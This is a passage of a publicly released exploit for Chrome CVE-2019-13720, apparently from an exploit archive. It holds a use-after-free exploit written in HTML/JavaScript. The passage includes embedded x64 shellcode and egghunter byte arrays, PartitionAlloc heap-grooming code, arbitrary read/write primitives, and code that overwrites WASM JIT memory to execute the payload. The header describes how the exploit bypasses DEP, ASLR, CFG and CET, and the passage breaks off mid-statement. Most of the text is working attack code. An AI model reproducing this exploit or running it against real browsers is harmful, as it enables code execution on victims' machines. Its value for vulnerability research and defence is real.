10 x64 \n# CVE: CVE-2019-13720 \n# Bypasses: DEP, High Entropy ASLR, CFG, CET \n# Github: https://github.com/forrest-orr/WizardOpium \n \n<html> \n<script> \n/*;; --------------------------------------------------------------------- | \n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium | \n;;;; --------------------------------------------------------------------- | \n;;;; Author: deadlock (Forrest Orr) - 2022 | \n;;;; --------------------------------------------------------------------- | \n;;;; Licensed under GNU GPLv3 | \n;;;; --------------------------------------------------------------------- | \n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 | \n;;;; 64-bit with CPU core counts: | \n;;;; ~ 16 cores (non-virtualized) | works | \n;;;; ~ 4 cores (virtualized) | works | \n;;;; ~ 2 cores (virtualized) | works | \n;;;; ~ 1 core (virtualized) | fails | \n;;;; | \n;;;; All of these tests finished successfully with a 95%+ success rate | \n;;;; with the exception of the 1 core tests, which fail with a 100% | \n;;;; frequency. Due to the nature of the exploit as both a UAF highly | \n;;;; sensitive to the state of the heap and a race condition, it appears | \n;;;; that a single core is unable to reliably reproduce the UAF or any | \n;;;; kind of consistency in the heap between executions. | \n;;;; --------------------------------------------------------------------- | \n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET | \n;;;; --------------------------------------------------------------------- | \n;;;; ## Sandboxing | \n;;;; ~ Chrome uses an isolated content child proces running under a | \n;;;; restricted token below Low Integrity to render JavaScript. | \n;;;; ~ Child process creation is restricted via Windows exploit | \n;;;; mitigation features on the OS level for Chrome renderers. | \n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a | \n;;;; sandbox escape (this was limited to Windows 7 since in newer | \n;;;; versions of Windows win32k syscalls are locked in Chrome for | \n;;;; security purposes). | \n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute | \n;;;; the WinExec shellcode within this exploit source. | \n;;;; --------------------------------------------------------------------- | \n;;;; ## Notes | \n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist | \n;;;; for both infoleaks and R/W primitives. | \n;;;; ~ The exploit should in theory work in any version of Chrome up to | \n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. | \n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is | \n;;;; initialized resulting in the creation of a single page of +RWX | \n;;;; JIT memory. This is then overwritten with a 673 byte egghunter | \n;;;; shellcode. | \n;;;; ~ The egghunter will scan through all committed +RW regions of | \n;;;; private memory within the compromised chrome.exe renderer process | \n;;;; and mark any region it identifies as +RWX which contains the egg | \n;;;; QWORD bytes and subsequentially execute it via a CALL instruction. | \n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 | \n;;;; array prefixed by the following egg QWORD bytes: | \n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 | \n;;;; --------------------------------------------------------------------- | \n;;;; ## Credits | \n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit | \n;;;; chain in the wild. | \n;;;; -------------------------------------------------------------------- */ \n \nconst Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]); \nconst Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb \nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory. \nlet GcPreventer = []; \nlet IIRFilters = []; \nvar SharedAudioCtx = undefined; \nlet FeedforwardSuperPageMetadata = undefined; \nlet OutputFloatArray = new Float32Array(10); \nlet MutableFreeListAudioBufs = []; \nlet DoubleAllocAudioBufs = []; \nlet ImageDataArray = []; \nconst EnableDebug = true; \nconst AlertOutput = false; \nvar HelperBuf = new ArrayBuffer(8); \nvar HelperDbl = new Float64Array(HelperBuf); \nvar HelperDword = new Uint32Array(HelperBuf); \nvar HelperBigInt = new BigUint64Array(HelperBuf); \nvar HelperUint8 = new Uint8Array(HelperBuf); \n \nfunction DebugLog(Message) { \nif(EnableDebug) { \nif(AlertOutput) { \nalert(Message); \n} \nelse { \nconsole.log(Message); // In IE, console only works if devtools is open. \n} \n} \n} \n \nfunction Sleep(delay) { \nreturn new Promise(resolve => setTimeout(resolve, delay)) \n} \n \nfunction ReverseBigInt(Val) { \nlet ReversedVal = BigInt(0); \nlet TempVal = Val; \n \nfor (let i = 0; i < 8; i++) { \nReversedVal = ReversedVal << BigInt(8); \nReversedVal += TempVal & BigInt(0xFF); \nTempVal = TempVal >> BigInt(8); \n} \n \nreturn ReversedVal; \n} \n \nfunction ClearBigIntLow21(Val) { \nlet BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111 \nlet ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000 \nreturn ClearedVal; \n} \n \nlet GetSuperPageBase = ClearBigIntLow21; \n \nfunction GetSuperPageMetadata(LeakedPtr) { \nlet SuperPageBase = GetSuperPageBase(LeakedPtr); \nreturn SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page \n} \n \nfunction GetPartitionPageIndex(LeakedPtr) { \nlet Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1); \nlet Index = (LeakedPtr & Low21Mask) >> BigInt(14); \nreturn Index; \n} \n \n \nfunction GetPartitionPageMetadata(LeakedPtr) { \nlet Index = GetPartitionPageIndex(LeakedPtr); \nlet partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20)); \nreturn partitionPageMetadataPtr; \n} \n \nfunction GetPartitionPageBase(LeakedPtr, Index) { \nlet SuperPageBase = GetSuperPageBase(LeakedPtr); \nlet PartitionPageBase = SuperPageBase + (Index << BigInt(14)); \nreturn PartitionPageBase; \n} \n \nfunction GC() { \nlet MyPromise = new Promise(function(GcCallback) { \nlet Arg; \n \nfor (var i = 0; i < 400; i++) { \nnew ArrayBuffer(1024 * 1024 * 60).buffer; \n} \n \nGcCallback(Arg); \n}); \n \nreturn MyPromise; \n} \n \n/* \nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf: \n00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=???????????????? \n*/ \n \nfunction LeakQword(FreeListHead, TargetAddress) { \nFreeListHead[0] = TargetAddress; \nlet TempVal = new BigUint64Array; \nTempVal.buffer; \nGcPreventer.push(TempVal); \nreturn ReverseBigInt(FreeListHead[0]); \n} \n \nfunction WriteQword(FreeListHead, TargetAddress, Val) { \nFreeListHead[0] = TargetAddress; \nlet TempVal = new BigUint64Array(1); \nTempVal.buffer; \nTempVal[0] = Val; \nGcPreventer.push(TempVal); \n} \n \nfunction CreateWasmJITExport() { \n/* \nAfter this function returns, a new region of memory will appear with a \nsingle system page of 0x1000 bytes set to RWX for the JIT region for \nthis WASM module \n \n0x00000ACDB6790000:0x40000000 | Private \n0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory \n0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory \n*/ \n \nvar ImportObj = { imports: { imported_func: arg => console.log(arg) } }; \nconst WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nconst WasmCode = new Uint8Array(WasmModuleBytes); \nconst WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj); \nreturn WasmModule.exports.exported_func; \n} \n \n/* \nstruct __attribute__((packed)) SlotSpanMetadata { \nunsigned long freelist_head; \nunsigned long next_slot_span; \nunsigned long bucket; \nuint32_t marked_full : 1; \nuint32_t num_allocated_slots : 13; \nuint32_t num_unprovisioned_slots : 13; \nuint32_t can_store_raw_size : 1; \nuint32_t freelist_is_sorted : 1; \nuint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1); \nuint16_t in_empty_cache : 1; \nuint16_t empty_cache_index : 7; \nuint16_t unused2 : (16 - 1 - 7); \n}; \n \nstruct PartitionPage { \nunion { \nstruct SlotSpanMetadata span; \nsize_t raw_size; \nstruct PartitionSuperPageExtentEntry head; \nstruct { \nchar pad[32 - sizeof(uint16_t)]; \nuint16_t slot_span_metadata_offset; \n}; \n}; \n}; \n \nstruct PartitionBucket { \nunsigned long active_slot_spans_head; \nunsigned long empty_slot_spans_head; \nunsigned long decommitted_slot_spans_head; \nuint32_t slot_size; \nuint32_t num_system_pages_per_slot_span : 8; \nuint32_t num_full_slot_spans : 24; \n}; \n*/ \n \nfunction HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) { \nfor(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) { \nSlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct \nHelperBigInt[0] = SlotSpanMetaAddress; \nDebugLog(\"... targetting slot span metadata at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \nBucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress); \nHelperBigInt[0] = BucketAddress; \nDebugLog(\"... leaked bucket address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \n \nif(BucketAddress != BigInt(0)) { \nBucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size \nBucketSize = LeakQword(FreeListHead, BucketAddress); \nHelperBigInt[0] = BucketSize; \nDebugLog(\"... leaked bucket size is \" + HelperDword[1].toString(16) + \" \" + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \n \nif(HelperDword[0] == SlotSize) { \nDebugLog(\"... found desired slot size! Reading freelist head for SlotSpan...\"); \nSlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct \nHelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress); \nDebugLog(\"... leaked slot span freelist address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \nreturn HelperBigInt[0]; \n} \n} \n} \n} \n \nfunction ExecutePayload(FreeListHead) { \nvar WasmExport = CreateWasmJITExport(); \nlet FileReaderObj = new FileReader; \nlet FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment \n \nDebugLog(\"... WASM module and FileReader created.\"); \nFileReaderObj.onerror = WasmExport; \nlet FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); \n \nif (!FileReaderLoaderPtr) { \nDebugLog(\"... failed to obtain free list head for bucket size 0x140 slot span\"); \nreturn; \n} \n \nHelperBigInt[0] = FileReaderLoaderPtr; \nDebugLog(\"... estimated a FileReaderLoader alloc address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nFileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent \nlet ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); \n \nif(ValidationPtr != FileReaderLoaderPtr) { \nHelperBigInt[0] = ValidationPtr; \nDebugLog(\"... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nlet FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68); \nlet VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28)); \nlet RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr); \nlet EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr); \nlet EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8)); \nlet JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8)); \nlet JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1); \nlet SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1); \nlet WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1); \nlet WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1); \nlet StubAddrFieldOffset = undefined; \n \nswitch (MajorVersion) { \ncase 77: \nStubAddrFieldOffset = BigInt(0x8) * BigInt(16); \nbreak; \ncase 76: \nStubAddrFieldOffset = BigInt(0x8) * BigInt(17); \nbreak \n} \n \nlet RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset); \nHelperBigInt[0] = RwxJitStubPtr; \nDebugLog(\"... resolved JIT stub address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nfor(var x = 0; x < Egghunter.length; x += 8) { \nJitChunkAddress = RwxJitStubPtr + BigInt(x); \nHelperBigInt[0] = JitChunkAddress; \n//DebugLog(\"... writing chunk of egghunter shellcode at offset \" + x.toString(10) + \" to JIT region at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nfor(var y = 0; y < 8; y++) { \nHelperUint8[y] = Egghunter[x + y]; \n} \n \nWriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]); \n} \n \nHelperBigInt[0] = RwxJitStubPtr; \nDebugLog(\"... executing shellcode at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nWasmExport(); \n} \nelse { \nDebugLog(\"... failed to validate re-claim of FileReaderLoader slot at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n} \n} \n \nasync function PrePayloadHeapGroom() { \nDebugLog(\"... grooming heap in preparation for R/W primitive creation and payload execution...\"); \nawait GC(); \nDoubleAllocAudioBufs = []; // These were the \"holders\" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. \n \nfor (var j = 0; j < 80; j++) { \nMutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000)); \n} \n \n// At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W. \n \nIIRFilters = new Array(1); \nawait GC(); \n \nfor (var j = 0; j < 336; j++) { \nImageDataArray.push(new ImageData(1, 2)); \n} \n \nImageDataArray = new Array(10); \nawait GC(); \n \nfor (var j = 0; j < MutableFreeListAudioBufs.length; j++) { \nlet MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer); \nif (MutableFreeListEntry[0] != BigInt(0)) { \nlet FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // 